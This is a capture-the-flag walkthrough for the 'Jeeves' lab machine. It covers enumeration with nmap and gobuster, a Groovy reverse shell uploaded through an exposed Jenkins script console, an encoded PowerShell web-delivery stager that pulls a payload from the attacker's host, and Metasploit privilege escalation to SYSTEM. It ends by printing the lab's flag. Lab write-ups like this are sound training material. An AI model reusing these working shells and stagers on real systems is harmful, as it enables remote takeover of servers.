Jeeves is a challenging box that tests the user’s ability to enumerate web directories, upload reverse shell code, and escalate privileges with metasploit. The creator of this box also tries to trick the user by hiding the flag, but it is easily uncovered with a few additional commands.
Step 1: Enumerate with NMAP
We start our investigation by scanning the target with NMAP.
➜ jeeves nmap -vv -A 10.129.213.25 -p- -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-02-02 21:50 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:50
Completed NSE at 21:50, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:50
Completed Parallel DNS resolution of 1 host. at 21:50, 0.03s elapsed
Initiating Connect Scan at 21:50
Scanning 10.129.213.25 [65535 ports]
Discovered open port 80/tcp on 10.129.213.25
Discovered open port 445/tcp on 10.129.213.25
Discovered open port 135/tcp on 10.129.213.25
Discovered open port 50000/tcp on 10.129.213.25
Connect Scan Timing: About 12.99% done; ETC: 21:54 (0:03:28 remaining)
Connect Scan Timing: About 40.51% done; ETC: 21:52 (0:01:30 remaining)
Connect Scan Timing: About 67.21% done; ETC: 21:52 (0:00:44 remaining)
Completed Connect Scan at 21:52, 124.20s elapsed (65535 total ports)
Initiating Service scan at 21:52
Scanning 4 services on 10.129.213.25
Completed Service scan at 21:52, 6.59s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.213.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:52
NSE Timing: About 99.82% done; ETC: 21:52 (0:00:00 remaining)
Completed NSE at 21:53, 40.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.40s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Nmap scan report for 10.129.213.25
Host is up, received user-set (0.033s latency).
Scanned at 2023-02-02 21:50:09 EST for 172s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-02-03T07:52:22
|_ start_date: 2023-02-03T07:48:59
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36704/tcp): CLEAN (Timeout)
| Check 2 (port 43812/tcp): CLEAN (Timeout)
| Check 3 (port 42756/udp): CLEAN (Timeout)
| Check 4 (port 14047/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m58s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.20 seconds
We can see that we have web applications running on ports 80 and 50000. Let’s check out each of the sites.
Step 2: Enumerating the Web Applications
We need to enumerate two web applications. We can use Gobuster to check for any unknown files or folders. We tried several wordlists on port 80, but we were unable to uncover any meaningful files or directories. Afterwards, we focused our attention on port 50000. We were able to uncover a directory on the second web application.
➜ jeeves gobuster -w /opt/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.129.213.25:50000
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.129.213.25:50000/
[+] Threads : 10
[+] Wordlist : /opt/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2023/02/16 12:32:57 Starting gobuster
=====================================================
/askjeeves (Status: 302)
=====================================================
2023/02/16 12:50:47 Finished
=====================================================
Upon visiting the page we see that we are on a Jenkins admin panel. After some exploring we uncover a script upload page at Manage Jenkins > Script Console. The page says that we can upload an arbitrary Groovy script. Perhaps we can upload a reverse shell to gain access to the target.
Step 3: Uploading and Connecting to the Reverse Shell
Upon searching Google for Groovy reverse shells we stumble upon the following page: https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6. We are provided with a sample script that we can edit for our own use.
String host=”localhost”;
int port=8044;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
We can simply edit the script to point to our ip address and port.
String host="10.10.16.12";
int port=4444;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
We need to set up our listener before running our script:
➜ jeeves nc -lvnp 4444
Listening on 0.0.0.0 4444
We can now upload and run the script. We are immediately given access to the server.
➜ jeeves nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.129.213.25 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>
We can quickly grab the user flag before moving on to privilege escalation.
Step 4: Migrating to a Meterpreter Session
We have a basic shell, but our enumeration and exploitation potential will be far greater if we can migrate to a meterpreter shell.
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python
View the full module info with the info, or info -d command.
msf6 exploit(multi/script/web_delivery) > set srvhost 10.10.16.12
srvhost => 10.10.16.12
msf6 exploit(multi/script/web_delivery) > set srvport 4445
srvport => 4445
msf6 exploit(multi/script/web_delivery) > set lhost 10.10.16.12
lhost => 10.10.16.12
msf6 exploit(multi/script/web_delivery) > set lport 4446
lport => 4446
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
=================
Id Name
-- ----
=> 0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.10.16.12:4446
[*] Using URL: http://10.10.16.12:4445/2TNX91PpvY8EvD
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbQAwAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbQAwAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMQAyADoANAA0ADQANQAvADIAVABOAFgAOQAxAFAAcAB2AFkAOABFAHYARAAvAGYASQBHAGMASQBqAFYAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADEAMgA6ADQANAA0ADUALwAyAFQATgBYADkAMQBQAHAAdgBZADgARQB2AEQAJwApACkAOwA=
We then need to paste the above powershell command into our existing shell.
C:\Users\Administrator\.jenkins>powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbQAwAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbQAwAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMQAyADoANAA0ADQANQAvADIAVABOAFgAOQAxAFAAcAB2AFkAOABFAHYARAAvAGYASQBHAGMASQBqAFYAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADEAMgA6ADQANAA0ADUALwAyAFQATgBYADkAMQBQAHAAdgBZADgARQB2AEQAJwApACkAOwA=
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbQAwAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbQAwAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMQAyADoANAA0ADQANQAvADIAVABOAFgAOQAxAFAAcAB2AFkAOABFAHYARAAvAGYASQBHAGMASQBqAFYAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADEAMgA6ADQANAA0ADUALwAyAFQATgBYADkAMQBQAHAAdgBZADgARQB2AEQAJwApACkAOwA=
#< CLIXML
We are then given a meterpreter shell on the target.
[*] 10.129.213.25 web_delivery - Delivering AMSI Bypass (1387 bytes)
[*] 10.129.213.25 web_delivery - Delivering Payload (3507 bytes)
[*] Sending stage (175686 bytes) to 10.129.213.25
[*] Meterpreter session 1 opened (10.10.16.12:4446 -> 10.129.213.25:49678) at 2023-02-16 13:19:50 -0500
Step 5: Finding Potential Exploits with the Local Exploit Suggester
We can use Metasploit’s local exploit suggester to find potential exploits against the target.
msf6 exploit(multi/script/web_delivery) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/script/web_delivery) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.213.25 - Collecting local exploits for x86/windows...
[*] 10.129.213.25 - 181 exploit checks are being tried...
[+] 10.129.213.25 - exploit/windows/local/bits_ntlm_token_impersonation: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.129.213.25 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.213.25 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bits_ntlm_token_impersonation Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_fodhelper Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2020_1048_printerdemon Yes The target appears to be vulnerable.
6 exploit/windows/local/cve_2020_1337_printerdemon Yes The target appears to be vulnerable.
7 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
8 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
9 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
10 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
11 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
12 exploit/windows/local/always_install_elevated No The target is not exploitable.
13 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
14 exploit/windows/local/bthpan No The target is not exploitable.
15 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
16 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
17 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
18 exploit/windows/local/ikeext_service No The check raised an exception.
19 exploit/windows/local/ipass_launch_app No The check raised an exception.
20 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
21 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
22 exploit/windows/local/mqac_write No The target is not exploitable.
23 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
24 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows 10 (10.0 Build 10586). is not vulnerable
25 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
26 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
27 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
28 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
29 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
30 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The target is not exploitable.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
We tried a few of the highly rated exploits, but we were only able to make progress with exploit/windows/local/ms16_075_reflection_juicy.
Step 6: Escalating Privileges
We can now use the exploit/windows/local/ms16_075_reflection_juicy exploit to compromise the target.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection_juicy) > show options
Module options (exploit/windows/local/ms16_075_reflection_juicy):
Name Current Setting Required Description
---- --------------- -------- -----------
CLSID {4991d34b-80a1-4291-83b6-3328366b9097} yes Set CLSID value of the DCOM to trigger
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC none yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.173 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_075_reflection_juicy) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows JEEVES\kohsuke @ JEEVES 10.10.16.12:4446 -> 10.129.213.25:49680 (10.129.213.25)
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set lhost 10.10.16.12
lhost => 10.10.16.12
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set lport 4446
lport => 4446
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run
[-] Handler failed to bind to 10.10.16.12:4446:- -
[-] Handler failed to bind to 0.0.0.0:4446:- -
[+] Target appears to be vulnerable (Windows 10 (10.0 Build 10586).)
[*] Launching notepad to host the exploit...
[+] Process 3584 launched.
[*] Reflectively injecting the exploit DLL into 3584...
[*] Injecting exploit into 3584...
[*] Exploit injected. Injecting exploit configuration into 3584...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.213.25
[*] Meterpreter session 2 opened (10.10.16.12:4446 -> 10.129.213.25:49694) at 2023-02-16 13:30:57 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
After supplying the required arguments and running the exploit we are presented with a SYSTEM shell. We now need to grab the flag.
Step 7: Accessing the Flag
After navigating to the administrator’s desktop we are unable to find a flag, but we have a hint as to how to access it. Upon reading the file titled hm.txt, we are presented with the following:
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 797 fil 2017-11-08 09:05:18 -0500 Windows 10 Update Assistant.lnk
100666/rw-rw-rw- 282 fil 2017-11-03 22:03:17 -0400 desktop.ini
100444/r--r--r-- 36 fil 2017-12-24 02:51:10 -0500 hm.txt
meterpreter > cat hm.txt
The flag is elsewhere. Look deeper.
We can drop into a system shell and use dir /R to view hidden files and folders:
meterpreter > shell
Process 4696 created.
Channel 2 created.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Documents and Settings\Administrator\Desktop>dir /R
dir /R
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\Documents and Settings\Administrator\Desktop
11/08/2017 09:05 AM <DIR> .
11/08/2017 09:05 AM <DIR> ..
12/24/2017 02:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 09:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,591,989,760 bytes free
C:\Documents and Settings\Administrator\Desktop>more < hm.txt:root.txt:$DATA
more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530
We are able to view the contents of the flag file by redirecting output to more. The only step remaining is to submit the flag.